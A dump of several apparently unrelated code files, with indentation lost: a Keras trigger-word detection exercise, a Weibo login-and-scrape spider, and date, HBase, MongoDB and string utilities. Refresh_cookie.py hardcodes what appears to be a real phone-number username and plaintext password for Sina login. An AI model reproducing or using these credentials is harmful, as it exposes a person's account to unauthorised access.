# Step 4: Superpose audio segment and background
new_background = background.overlay(audio_clip, position=segment_time[0])
return new_background, segment_time
# # test case for insert audio
# np.random.seed(5)
# audio_clip, segment_time = insert_audio_clip(backgrounds[0], activates[0], [(3790, 4400)])
# audio_clip.export("insert_test.wav", format="wav")
# print("Segment Time: ", segment_time)
# insert ones
def insert_ones(y, segment_end_ms):
"""
Update the label vector y. The labels of the 50 output steps strictly after the end of the segment
    should be set to 1. By strictly we mean that the label of segment_end_y itself should be 0, while the
    50 following labels should be ones.
Arguments:
y -- numpy array of shape (1, Ty), the labels of the training example
segment_end_ms -- the end time of the segment in ms
Returns:
y -- updated labels
"""
    # convert segment_end_ms from milliseconds to its index among the Ty output (spectrogram) steps
segment_end_y = int(segment_end_ms * Ty / 10000.0)
# Add 1 to the correct index in the background label (y)
for i in range(segment_end_y + 1, segment_end_y + 51):
if i < Ty:
y[0, i] = 1
return y
# # test case for insert ones's sanity checks
# arr1 = insert_ones(np.zeros((1, Ty)), 9700)
# plt.plot(insert_ones(arr1, 4251)[0, :])
# print("sanity checks:", arr1[0][1333], arr1[0][634], arr1[0][635])
# creating training examples
def create_training_example(background, activates, negatives):
"""
Creates a training example with a given background, activates, and negatives.
Arguments:
background -- a 10 second background audio recording
activates -- a list of audio segments of the word "activate"
negatives -- a list of audio segments of random words that are not "activate"
Returns:
x -- the spectrogram of the training example
y -- the label at each time step of the spectrogram
"""
# Set the random seed
np.random.seed(18)
# Make background quieter
background = background - 20
# Step 1: Initialize y (label vector) of zeros (≈ 1 line)
y = np.zeros((1, Ty))
# Step 2: Initialize segment times as empty list (≈ 1 line)
previous_segments = []
# Select 0-4 random "activate" audio clips from the entire list of "activates" recordings
number_of_activates = np.random.randint(0, 5)
random_indices = np.random.randint(len(activates), size=number_of_activates)
random_activates = [activates[i] for i in random_indices]
# Step 3: Loop over randomly selected "activate" clips and insert in background
for random_activate in random_activates:
# Insert the audio clip on the background
background, segment_time = insert_audio_clip(background, random_activate, previous_segments)
# Retrieve segment_start and segment_end from segment_time
segment_start, segment_end = segment_time
# Insert labels in "y"
y = insert_ones(y, segment_end)
# Select 0-2 random negatives audio recordings from the entire list of "negatives" recordings
number_of_negatives = np.random.randint(0, 3)
random_indices = np.random.randint(len(negatives), size=number_of_negatives)
random_negatives = [negatives[i] for i in random_indices]
# Step 4: Loop over randomly selected negative clips and insert in background
for random_negative in random_negatives:
# Insert the audio clip on the background
background, _ = insert_audio_clip(background, random_negative, previous_segments)
# Standardize the volume of the audio clip
background = match_target_amplitude(background, -20.0)
# Export new training example
file_handle = background.export("train" + ".wav", format="wav")
print("File (train.wav) was saved in your directory.")
# Get and plot spectrogram of the new recording (background with superposition of positive and negatives)
x = graph_spectrogram("train.wav")
return x, y
# test case for creating training example
# x, y = create_training_example(backgrounds[0], activates, negatives)
# Full training set
# Load preprocessed training examples
X = np.load("./XY_train/X.npy")
Y = np.load("./XY_train/Y.npy")
# Load preprocessed dev set examples
X_dev = np.load("./XY_dev/X_dev.npy")
Y_dev = np.load("./XY_dev/Y_dev.npy")
""" Model """
def model(input_shape):
"""
Function creating the model's graph in Keras.
Argument:
input_shape -- shape of the model's input data (using Keras conventions)
Returns:
model -- Keras model instance
"""
X_input = Input(shape=input_shape)
# Step 1: CONV layer (≈4 lines)
X = Conv1D(filters=196, kernel_size=15, strides=4)(X_input) # CONV1D
X = BatchNormalization()(X) # Batch normalization
X = Activation("relu")(X) # ReLu activation
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 2: First GRU Layer (≈4 lines)
X = GRU(units=128, return_sequences=True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
# Step 3: Second GRU Layer (≈4 lines)
X = GRU(units=128, return_sequences=True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 4: Time-distributed dense layer (≈1 line)
X = TimeDistributed(Dense(1, activation="sigmoid"))(X) # time distributed (sigmoid)
model = Model(inputs=X_input, outputs=X)
return model
# test case for model
# model = model(input_shape = (Tx, n_freq))
# model.summary()
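# Shape check (illustrative, assuming Tx = 5511 input time steps as used earlier in this exercise):
# the Conv1D layer with kernel_size=15 and strides=4 produces floor((5511 - 15) / 4) + 1 = 1375
# output steps, which is why the label vector length Ty is 1375.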
# load a trained model for saving time
# # load model
# # todo: UserWarning: Error in loading the saved optimizer state. As a result, your model is starting with a freshly initialized optimizer warnings.warn('Error in loading the saved optimizer '
# # solution: installed HDFview and opened the hdf5 file and deleted the optimizer part of the file.
# model = load_model('./models/tr_model.h5')
#
# # fit the model
# opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, decay=0.01)
# model.compile(loss='binary_crossentropy', optimizer=opt, metrics=["accuracy"])
#
# # test the model
# loss, acc = model.evaluate(X_dev, Y_dev)
# print("Dev set accuracy = ", acc)
""" Making Predictions """
def detect_triggerword(filename):
plt.subplot(2, 1, 1)
x = graph_spectrogram(filename)
# the spectogram outputs (freqs, Tx) and we want (Tx, freqs) to input into the model
x = x.swapaxes(0, 1)
x = np.expand_dims(x, axis=0)
predictions = model.predict(x)
plt.subplot(2, 1, 2)
plt.plot(predictions[0, :, 0])
plt.ylabel('probability')
plt.show()
return predictions
chime_file = "audio_examples/chime.wav"
def chime_on_activate(filename, predictions, threshold):
audio_clip = AudioSegment.from_wav(filename)
chime = AudioSegment.from_wav(chime_file)
Ty = predictions.shape[1]
# Step 1: Initialize the number of consecutive output steps to 0
consecutive_timesteps = 0
# Step 2: Loop over the output steps in the y
for i in range(Ty):
# Step 3: Increment consecutive output steps
consecutive_timesteps += 1
# Step 4: If prediction is higher than the threshold and more than 75 consecutive output steps have passed
if predictions[0, i, 0] > threshold and consecutive_timesteps > 75:
# Step 5: Superpose audio and background using pydub
audio_clip = audio_clip.overlay(chime, position=((i / Ty) * audio_clip.duration_seconds) * 1000)
# Step 6: Reset consecutive output steps to 0
consecutive_timesteps = 0
audio_clip.export("chime_output.wav", format='wav')
filename = "./raw_data/dev/1.wav"
prediction = detect_triggerword(filename)
chime_on_activate(filename, prediction, 0.5)
filename = "./raw_data/dev/2.wav"
prediction = detect_triggerword(filename)
chime_on_activate(filename, prediction, 0.5)
``` |
{
"source": "824zzy/-",
"score": 2
} |
#### File: -/weibo_mine_hot/Refresh_cookie.py
```python
import binascii
import rsa
import base64
import requests
import re
import json
def prelogin():
url="https://login.sina.com.cn/sso/prelogin.php?entry=account&callback=sinaSSOController.preloginCallBack&su=MTU2MjAxNTE0NzU%3D&rsakt=mod&client=ssologin.js(v1.4.15)&_=1476186181803"
html=requests.get(url).text
jsonStr = re.findall(r'\((\{.*?\})\)', html)[0]
data = json.loads(jsonStr)
servertime = data["servertime"]
nonce = data["nonce"]
pubkey = data["pubkey"]
rsakv = data["rsakv"]
return servertime, nonce, pubkey, rsakv
def getSu(username):
su = base64.b64encode(username.encode('utf-8')).decode('utf-8')
return su
def getSp(password, servertime, nonce, pubkey):
pubkey = int(pubkey, 16)
key = rsa.PublicKey(pubkey, 65537)
message = str(servertime) + '\t' + str(nonce) + '\n' + str(password)
message = message.encode('utf-8')
sp = rsa.encrypt(message, key)
sp = binascii.b2a_hex(sp)
return sp
def main():
servertime, nonce, pubkey, rsakv = prelogin()
su = getSu("15802252189")
sp = getSp("kobe81", servertime, nonce, pubkey)
postData = {
'entry': 'weibo',
'gateway': '1',
'from': '',
'savestate': '7',
'userticket': '1',
"pagerefer": "http://open.weibo.com/wiki/2/statuses/home_timeline",
"vsnf": "1",
"su": su,
"service": "miniblog",
"servertime": servertime,
"nonce": nonce,
"pwencode": "rsa2",
"rsakv": rsakv,
"sp": sp,
"sr": "1440*900",
"encoding": "UTF-8",
"prelt": "126",
"url": "http://open.weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack",
"returntype": "META",
}
loginURL = r'http://login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.18)'
session = requests.Session()
res = session.post(loginURL, data=postData)
lst= res.cookies.items()
cookie=''
for each in lst:
cookie+= each[0]+'='+each[1]+';'
with open('cookies','w') as f:
f.write(cookie)
print 'cookies have refreshed'
```
#### File: -/weibo_mine_hot/Ultimate_ComSpider.py
```python
import requests
import json
import scrapy
import re
import writers
import get_weibo_cookie
import time
from retrying import retry
import Normalize_date_time
import Refresh_cookie
import urllib
def space(s):
return re.sub('\s+', '', s)
class weibocom(object):
def __init__(self):
self.maxpage=50
self.baseurl='http://s.weibo.com/weibo'
self.session=get_weibo_cookie.login()
self.db=writers.Content()
self.headers={
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116 Safari/537.36'
}
#with open('PycharmProjects/TestZhu/tjufe/weibo_mine_hot/cookies','r') as f:
with open('cookies','r') as f:
cook=f.readlines()[0]
self.cookie={'Cookie':cook}
def start_html(self,name):
# keep the raw keyword so that retrying via start_html(self.name) does not quote it twice
self.name=name
quoted_name=urllib.quote(name)
urls=['{}/{}&nodup=1&page={}'.format(self.baseurl,quoted_name,page) for page in range(1,self.maxpage)]
for each in urls:
html=requests.get(each,cookies=self.cookie,headers=self.headers).text
time.sleep(10)
self.parse(html)
def parse(self, response):
htmls = re.findall('STK\.pageletM\.view\((.*?)\)<', response, re.S)
try:
rule_html = self.parse_html_by_pid(htmls)
except:
rule_html = None
if rule_html:
self.extract_one_page(rule_html)
else:
print htmls
# @retry(_stop_max_attempt_number=2)
def parse_html_by_pid(self, htmls):
for each in htmls:
pid = json.loads(each)['pid']
if pid == u'pl_weibo_direct':
return json.loads(each)['html']
print 'cookie unuse?'
Refresh_cookie.main()
print 'restart...'
self.start_html(self.name)
def extract_one_page(self, html):
con_lst = scrapy.Selector(text=html).xpath('.//div[@class="WB_cardwrap S_bg2 clearfix"]')
length=len(con_lst)
print 'the length of constant page is {}'.format(length)
if length<8:
Refresh_cookie.main()
print 'restart...'
self.start_html(self.name)
for each in con_lst:
msg_id = each.xpath('.//div[@mid]/@mid').extract_first()
msg_url_action_data = each.xpath('.//ul[@class="feed_action_info feed_action_row4"]/li[2]/a[@action-data]/@action-data').extract_first()
msg_url = re.search('url=(.*?)&',msg_url_action_data).group(1)
msg_user_id= re.search('weibo.com/(.*?)/',msg_url).group(1)
content_lst = each.xpath('.//p[@class="comment_txt"]')
msg_content = "".join([p.xpath('string(.)').extract_first().strip() for p in content_lst])
contain = each.xpath('.//div[@class="feed_from W_textb"]')
pretime = contain.xpath('.//a[@node-type="feed_list_item_date"]/text()').extract_first()
try:
msg_time = Normalize_date_time.normalize_datetime(pretime)
except:
msg_time=None
pass
resource = contain.xpath('.//a[@rel="nofollow"]/text()').extract_first()
msg_up= msg_cmt = msg_resport = msg_collection = 0
comment_msg = each.xpath('.//div[@class="feed_action clearfix"]/ul/li')
for every in comment_msg:
value = every.xpath('string(.)').extract_first()
if u'收藏' in value:
try:
msg_collection = re.search('(\d+)', value).group(1)
except:
pass
if u'转发' in value:
try:
msg_resport = re.search('(\d+)', value).group(1)
except:
pass
if u'评论' in value:
try:
msg_cmt = re.search('(\d+)', value).group(1)
except:
pass
if every.xpath('.//a[@title]/@title').extract_first() == u'赞':
msg_up = every.xpath('string(.)').extract_first()
is_resport = each.xpath('.//div[@class="comment"]')
msg_resport_url = ''
if is_resport:
msg_resport_url_source = is_resport.xpath(
'.//a[@suda-data="key=tblog_search_weibo&value=weibo_zhuan_p"]/@href').extract_first()
msg_resport_url = re.search('(^.*?)\?', msg_resport_url_source).group(1)
m=(self.name,msg_id,msg_url,msg_user_id,msg_content,msg_time,resource,msg_up,msg_resport,msg_cmt,msg_collection,msg_resport_url)
print m
self.db.insertIntoDB1(m)
if msg_resport_url:
self.extract_one_article(msg_resport_url)
@retry(stop_max_attempt_number=3)
def extract_html_bydomid(self,url):
response=requests.get(url,headers=self.headers,cookies=self.cookie).text
htmls=re.findall('<script>FM\.view\((.*?)\)</script>', response, re.S)
for html in htmls:
try:
if re.match(u'Pl_Official_WeiboDetail__\d+', json.loads(html)['domid']):
return json.loads(html)['html']
except:
continue
print 'dont exist weibodetail'
def extract_one_article(self,url):
try:
html=self.extract_html_bydomid(url)
selector=scrapy.Selector(text=html)
weibo_id=selector.xpath('.//div[@class="WB_from S_txt2"]/a/@name').extract_first()
weibo_time_pre = selector.xpath('.//div[@class="WB_from S_txt2"]/a[@node-type="feed_list_item_date"]/text()').extract_first()
weibo_time = Normalize_date_time.normalize_datetime(weibo_time_pre)
weibo_content=space(selector.xpath('.//div[@node-type="feed_list_content"]')[0].xpath('string(.)').extract_first())
weibo_up = selector.xpath('.//span[@node-type="like_status"]')[0].xpath('string(.)').extract_first()
weibo_report = selector.xpath('.//span[@class="line S_line1" and @node-type="forward_btn_text"]')[0].xpath('string(.)').extract_first()
weibo_comment = selector.xpath('.//span[@class="line S_line1" and @node-type="comment_btn_text"]')[0].xpath('string(.)').extract_first()
try:
weibo_up = re.search('(\d+)', weibo_up).group(1)
except:
weibo_up = 0
try:
weibo_report = re.search('(\d+)', weibo_report).group(1)
except:
weibo_report = 0
try:
weibo_comment = re.search('(\d+)', weibo_comment).group(1)
except:
weibo_comment=0
m=(self.name,url,weibo_id,weibo_time,weibo_content,weibo_up,weibo_report,weibo_comment)
self.db.inserIntoDB2(m)
print m
except:
pass
p=weibocom()
p.start_html('张清扬')
``` |
{
"source": "825477418/XX",
"score": 3
} |
#### File: XX/Date/DatetimeHelper.py
```python
import datetime
import time
import pandas as pd
import XX.funclib as cfun
# Get the timestamp offset from today by the given number of months/days
def get_add_date_ts(month=0, day=1, start_ts=None):
if start_ts:
x = time.localtime(start_ts)
else:
x = time.localtime(time.time())
Y = int(time.strftime('%Y', x))
M = int(time.strftime('%m', x))
D = int(time.strftime('%d', x))
z = datetime.datetime(Y, M, D)
starts = str(z + pd.tseries.offsets.DateOffset(months=month, days=day))
ts = int(time.mktime(time.strptime(starts, '%Y-%m-%d %H:%M:%S')))
return ts
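# Illustrative example: with the defaults (month=0, day=1) the function returns the timestamp
# of the next midnight, because the current date is truncated to 00:00:00 before the
# pandas DateOffset is added.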
# Convert a '%Y-%m-%d %H:%M:%S' string to a timestamp
def str_to_ts(str1):
return int(time.mktime(time.strptime(str1, '%Y-%m-%d %H:%M:%S')))
# Convert a timestamp to a date string
def ts_to_date(ts=None):
return time.strftime('%Y-%m-%d', time.localtime(ts))
# Convert a timestamp to a datetime string
def ts_to_datetime(ts=None):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# Convert a timestamp to a time string
def ts_to_time(ts=None):
return time.strftime('%H:%M:%S', time.localtime(ts))
# Get the current datetime string (ts defaults to now at call time, not at module import time)
def get_now_time(ts=None):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# Get today's date string
def get_today(ts=None):
return time.strftime('%Y-%m-%d', time.localtime(ts))
# Get the current year-month string
def get_this_month(ts=None):
return time.strftime('%Y-%m', time.localtime(ts))
# Get the current hour string
def get_hours(ts=None):
return time.strftime('%H', time.localtime(ts))
# Normalize a relative date expression (delegates to funclib.str_to_standard_time)
def get_calc_date(s):
return cfun.str_to_standard_time(s)
def is_date(date):
try:
date = date.strip()
if len(date) == 0:
return False
if ":" in date:
if date.count(":") == 1:
time.strptime(date, "%Y-%m-%d %H:%M")
elif date.count(":") == 2:
time.strptime(date, "%Y-%m-%d %H:%M:%S")
elif "-" in date:
time.strptime(date, "%Y-%m-%d")
elif "/" in date:
time.strptime(date, "%Y/%m/%d")
elif "." in date:
time.strptime(date, "%Y.%m.%d")
elif len(date) == 8:
time.strptime(date, "%Y%m%d")
return True
except Exception as e:
return False
def get_date(date):
date = date.replace("年", "-").replace("月", "-").replace("日", "").replace("号", "").replace("点", ":").replace("时",
":").replace(
"分", ":").replace("秒", "")
date = cfun.str_to_standard_time(date)
try:
date = date.strip()
if len(date) == 0:
return False
date = cfun.str_to_standard_time(date)
if ":" in date:
if date.count(":") == 1:
date = time.strptime(date, "%Y-%m-%d %H:%M")
elif date.count(":") == 2:
date = time.strptime(date, "%Y-%m-%d %H:%M:%S")
elif "-" in date:
if len(date.split("-")[0]) == 4:
# "2018-01-01"
date = time.strptime(date, "%Y-%m-%d")
elif len(date.split("-")[0]) == 2 and date.count("-") == 2:
date = time.strptime("20" + date, "%Y-%m-%d")
elif len(date.split("-")[0]) == 2 and date.count("-") == 1:
date = time.strptime(get_today()[:4] + "-" + date, "%Y-%m-%d")
elif "/" in date:
date = time.strptime(date, "%Y/%m/%d")
elif "." in date:
date = time.strptime(date, "%Y.%m.%d")
elif len(date) == 8:
date = time.strptime(date, "%Y%m%d")
else:
date = ""
return time.strftime('%Y-%m-%d', date)
except Exception as e:
print(e)
return ""
# Convert a timestamp to an ISO 8601 string
def ts_to_iso8601(ts=None, format_='%Y-%m-%dT%H:%M:%S.%fZ'):
ts = time.time() if ts is None else ts  # default to "now" at call time, not at import time
format_ = format_.replace('%f', '{-FF-}')  # handle the fractional-second field %f separately
length = min(16, len(str(ts)))  # at most microsecond precision
# extract the millisecond/microsecond digits
sec = '0'
if length != 10:  # not a plain second-level timestamp
sec = str(ts)[:16][-(length - 10):]  # keep at most 16 digits, then take the trailing ms/us part
sec = '{:0<6}'.format(sec)  # pad on the right with zeros to 6 digits
timestamp = float(str(ts)[:10])  # reduce to a second-level timestamp
return datetime.datetime.utcfromtimestamp(timestamp).strftime(format_).replace('{-FF-}', sec)
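# Illustrative example: ts_to_iso8601(1609459200123) -> '2021-01-01T00:00:00.123000Z'
# (the trailing three digits of the millisecond timestamp become the fractional field, right-padded to six digits).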
if __name__ == '__main__':
print(ts_to_iso8601())
```
#### File: XX/DB/HappyBaseHelper.py
```python
import happybase
class HappyBaseHelper:
connection = None
table = None
pool = None
def __init__(self, **kw):
if kw:
self.connection = happybase.Connection(**kw)
def get_connection_pool(self, size=128, **kw):
self.pool = happybase.ConnectionPool(**kw, size=size)
return self.pool
def get_connection(self, **kwargs):
if kwargs.get("host"):
self.connection = happybase.Connection(**kwargs)
return self.connection
def get_table(self, table_name, conn=None, pool=None):
self.connection = conn if conn else self.connection
return self.connection.table(table_name)
# Create a table
def create_table(self, table_name, columns, conn=None):
self.connection = conn if conn else self.connection
return self.connection.create_table(table_name, columns)
# List the existing tables
def get_tables(self, conn=None):
self.connection = conn if conn else self.connection
return self.connection.tables()
# Delete a table (happybase's delete_table expects the table name, not a Table object)
def del_table(self, table_name, disable=False, conn=None):
self.connection = conn if conn else self.connection
return self.connection.delete_table(table_name, disable)
# Get a single row
def get_row(self, row, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.row(row)
# Get multiple rows (expects a list of row keys)
def get_rows(self, rows, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.rows(rows)
# Delete a whole row or specific columns
def del_row(self, row, columns=None, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.delete(row, columns)
# Put a row (forward the caller's timestamp/wal instead of hard-coding them)
def add_row(self, row, data, timestamp=None, wal=True, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.put(row, data, timestamp=timestamp, wal=wal)
```
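A minimal usage sketch for the helper above, assuming an HBase Thrift server on localhost:9090, an existing table `demo` with a column family `cf`, and that the class is importable as `XX.DB.HappyBaseHelper.HappyBaseHelper`.
```python
# Hypothetical usage sketch; the host, port and table names are assumptions, not project defaults.
from XX.DB.HappyBaseHelper import HappyBaseHelper

helper = HappyBaseHelper(host="localhost", port=9090)   # opens a happybase.Connection
print(helper.get_tables())                              # list existing tables
helper.add_row(b"row-1", {b"cf:greeting": b"hello"}, table_name="demo")
print(helper.get_row(b"row-1", table_name="demo"))      # -> {b'cf:greeting': b'hello'}
```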
#### File: XX/DB/HBaseHelper.py
```python
import time
from hbase import Hbase
from hbase.ttypes import *
from thrift.protocol import TBinaryProtocol
from thrift.transport import TSocket
import XX.Encrypt.EncryptHelper as enc
class HBaseHelper:
client = None
def __init__(self, **kw):
self.transport = TSocket.TSocket(kw.get("host", "localhost"), kw.get("port", 9090))
self.transport.open()
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.client = Hbase.Client(self.protocol)
def get_client(self, **kw):
transport = TSocket.TSocket(kw.get("host", "localhost"), kw.get("port", 9090))
transport.open()
protocol = TBinaryProtocol.TBinaryProtocol(transport)
self.client = Hbase.Client(protocol)
return self.client
def get_client_by_cfg(self, cfg):
return self.get_client(**cfg)
# Return the cached response for (spider, url) if the stored cell is younger than expire_seconds
def get_crawl_cache_response(self, table_name, spider_name, url, expire_seconds=86400, client=None):
self.client = client if client else self.client
result = self.client.getRowWithColumns(table_name, spider_name + "_" + enc.Encrypt.md5(url), ["data:json"])
if result:
if time.time() - result[0].columns.get('data:json').timestamp // 1000 <= expire_seconds:
return result[0].columns.get('data:json').value
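# Note: HBase cell timestamps are in milliseconds, hence the // 1000 above before comparing
# the cell age (seconds) against expire_seconds.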
# Store a crawled response in the cache table
def add_crawl_cache_response(self, project, spider_name, url, fc, value, client=None):
self.client = client if client else self.client
mutation = Mutation(column=fc, value=value)
return self.client.mutateRow("crawl_cache_" + project, spider_name + "_" + enc.Encrypt.md5(url), [mutation])
# Create a table
def create_table(self, table_name, columns, client=None):
self.client = client if client else self.client
self.client.createTable(table_name, columns)
# List the existing tables
def get_tables(self, client=None):
self.client = client if client else self.client
return self.client.getTableNames()
# Delete an entire row
def del_row(self, table_name, row, client=None):
self.client = client if client else self.client
return self.client.deleteAllRow(table_name, row)
# Delete a column
def del_row_columns(self, table_name, row, column, client=None):
self.client = client if client else self.client
self.client.deleteAll(table_name, row, column)
# Scan a table and return up to `limit` rows
def get_lists(self, table, start_row, columns, limit=10, client=None):
self.client = client if client else self.client
scan_id = self.client.scannerOpen(table, start_row, columns)
return self.client.scannerGetList(scan_id, limit)
# Write a single column value to a row
def add_row_column(self, table, row, fc, value, client=None):
self.client = client if client else self.client
mutation = Mutation(column=fc, value=value)
return self.client.mutateRow(table, row, [mutation])
if __name__ == '__main__':
hb = HBaseHelper(host="zhihan00")
print(hb.get_tables())
exit()
columns = list()
columns.append(ColumnDescriptor(name='source'))
columns.append(ColumnDescriptor(name='data'))
hb.create_table("crawl_zhihan", columns)
exit()
start_row = ""
while 1:
results = hb.get_lists("crawl_cache_zhihan", start_row, ["source"])
if not results:
print("All Over")
break
for result in results:
start_row = result.row
print(result.row, result.columns["source:url"].value)
time.sleep(0.5)
print("--")
```
#### File: XX/DB/MongoHelper.py
```python
import pymongo
class MongoHelper():
def __init__(self, *arg, **kw):
self.host = kw.get("host", "localhost")
self.port = kw.get("host", 27017)
@staticmethod
def get_connection(host="localhost", port=2707, pwd=None):
return pymongo.MongoClient(host, port)
@staticmethod
def get_connection_db(host="localhost", port=2707, db=None, pwd=None):
conn = MongoHelper.get_connection(host, port)
return conn.db
@staticmethod
def get_collection(host="localhost", port=2707, db=None, collection_name=None, username=None, password=None):
db = MongoHelper.get_connection_db(host, port, db)
return db.collection_name
if __name__ == '__main__':
import XX.Model.Struct.MongoConn as MC
config = MC.zhihan00_cfg
client = MongoHelper.get_connection(**config)
db = client.dbname
col = db.col
print(db)
print(col)
print(col.insert_one({"x": 12}).inserted_id)
```
#### File: 825477418/XX/funclib.py
```python
import datetime
import json
import re
import traceback
# !!! Deprecated: kept only for compatibility with older spiders
def unicode_to_str(text, encoding=None, errors='strict'):
"""Return the str representation of text in the given encoding. Unlike
.encode(encoding) this function can be applied directly to a str
object without the risk of double-decoding problems (which can happen if
you don't use the default 'ascii' encoding)
"""
if encoding is None:
encoding = 'utf-8'
if isinstance(text, bytes):
return text.decode(encoding, errors)
elif isinstance(text, str):
return text
else:
raise TypeError('unicode_to_str must receive a unicode or str object, got %s' % type(text).__name__)
# Convert built-in data types to str
def to_str(data):
if isinstance(data, (int, float, bool)) or data is None:
return str(data)
elif isinstance(data, bytes):
return data.decode('utf-8')
elif isinstance(data, str):
return data
elif isinstance(data, list):
return __list_to_str(data)
elif isinstance(data, dict):
return __dict_to_str(data)
elif isinstance(data, tuple):
return __tuple_to_str(data)
elif isinstance(data, set):
return __set_to_str(data)
elif isinstance(data, (datetime.datetime, datetime.date)):
return __datetime_to_str(data)
else:
print("Don't know how to change %s to str!" % str(type(data)))
return ''
# Convert a dict to a string representation
def __dict_to_str(data_dict):
line = '{'
# print data_dict.items()
for k, v in data_dict.items():
line += '%s: %s, ' % (k, to_str(v))
return line.strip(', ') + '}'
# Convert a list to a string representation
def __list_to_str(data_list):
line = '['
for var in data_list:
line += '%s, ' % to_str(var)
return line.strip(', ') + ']'
# Convert a tuple to a string representation
def __tuple_to_str(data_tuple):
return '(' + __list_to_str(list(data_tuple)).strip('[]') + ')'
# Convert a set to a string representation
def __set_to_str(data_set):
return 'set(' + __list_to_str(list(data_set)) + ')'
def __datetime_to_str(date_time):
if isinstance(date_time, datetime.date):
return str(date_time)
return date_time.strftime('%Y-%m-%d %H:%M:%S %f')
# !!! Deprecated: kept only for compatibility with older spiders
def json_to_dict(target_unicode_str):
try:
target = target_unicode_str[target_unicode_str.index("{"):]
return json.loads(target)
except:
pass
# Parse a GBK-encoded JSON string into a dict
def json_to_dict_gbk(target_gbk_str):
try:
return json.loads(__json_to_standard(target_gbk_str), encoding="gbk")
except:
pass
# Parse a UTF-8 encoded JSON string into a dict
def json_to_dict_utf8(target_utf8_str):
try:
return json.loads(__json_to_standard(target_utf8_str), encoding="utf-8")
except:
pass
# Internal helper: trim the input down to the outermost {...} block
def __json_to_standard(target_str):
target = target_str[target_str.index("{"):]
target = target[:target.rindex("}") + 1]
return target
# Return the largest number found in a list of strings (page numbers usually start from 1)
def list_max_number(target_list):
new_list = []
for i in target_list:
i_buffer = ''
for j in i:
if j.isdigit() == True:
i_buffer += j
if i_buffer.isdigit() == True:
new_list.append(int(i_buffer))
if new_list:
return int(max(new_list))
else:
return 1
# Strip all whitespace (spaces, newlines, carriage returns) from a string
def clean_str_space(target_str):
return "".join(target_str.split())
# Strip HTML tags from a string
def clean_str_label(target_str):
re_flag = re.compile(r'<[^>]*>', re.S)
result = re_flag.sub('', target_str)
return result
# Convert a string like "[a, b]" into a list
def str_to_list(target_str):
if isinstance(target_str, str):
if target_str == '':
return []
elif target_str[0] == '[' and target_str[-1] == ']':
xlist = []
for i in target_str[1:-1].split(','):
if i == '' or i == ' ':
continue
xlist.append(i)
return xlist
else:
raise TypeError(
'String must have [ and ], got %s' % type(target_str).__name__)
else:
raise TypeError('Type must be string, got %s' %
type(target_str).__name__)
# Convert a "k=v;k=v" style string into a dict
def str_to_dict(target_str):
dict = {}
for i in target_str.split(';'):
if '=' in i:
dict[i.split('=')[0]] = i.split('=')[1]
else:
continue
return dict
# Extract the digits of a string as an int
def str_to_digit(target_str):
try:
if isinstance(target_str, bytes):
target_str = to_str(target_str)
if len(target_str) > 0:
return int(re.sub("\D", "", target_str))
else:
print("no str")
return None
except:
traceback.print_exc()
return None
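# Illustrative example: str_to_digit("共1234页") -> 1234 (re.sub("\D", "", ...) strips every
# non-digit character before the int() conversion).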
# Extract a datetime-like substring from a string
def str_to_time(target_timestr):
try:
if isinstance(target_timestr, bytes):
target_timestr = to_str(target_timestr)
r = re.search(
u'\d{4}(:|-|\\|/|年)\d{1,2}(:|-|\\|/|月)\d{1,2}(|日) \d{1,2}(:|-|\\|/|时|点)\d{1,2}', target_timestr)
if r:
return r.group(0)
else:
return None
except:
return None
# Resolve relative expressions such as "2小时前" / "3天后" into an absolute datetime
def str_to_standard_time(target_cntime_str):
now = datetime.datetime.now()
# calc: False means subtract the offset ("前"), True means add it ("后")
if isinstance(target_cntime_str, bytes):
target_cntime_str = to_str(target_cntime_str)
if '前' in target_cntime_str:
calc = False
elif '后' in target_cntime_str:
calc = True
else:
return target_cntime_str
if '秒' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(seconds=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(seconds=str_to_digit(target_cntime_str))
elif '分' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(minutes=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(minutes=str_to_digit(target_cntime_str))
elif '时' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(hours=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(hours=str_to_digit(target_cntime_str))
elif '天' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(days=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(days=str_to_digit(target_cntime_str))
elif '周' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(weeks=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(weeks=str_to_digit(target_cntime_str))
else:
raise ValueError('target_cntime_str must include 时分秒天周, and so on ')
return stand_time.strftime('%Y-%m-%d %H:%M:%S')
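# Illustrative example: str_to_standard_time("2小时前") returns the current time minus two hours
# formatted as '%Y-%m-%d %H:%M:%S'; strings without 前/后 are returned unchanged.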
# Recursively drop empty values from a dict/list and rewrite '.' in keys to '~'
def clean_dict(data_dict):
if isinstance(data_dict, dict):
for k, v in list(data_dict.items()):  # iterate over a copy so keys can be popped (required on Python 3)
if not v == 0 and not v:
data_dict.pop(k)
else:
if '.' in k:
data_dict[re.sub('\.', '~', k)] = data_dict.pop(k)
clean_dict(v)
elif isinstance(data_dict, list):
for var in data_dict:
clean_dict(var)
return data_dict
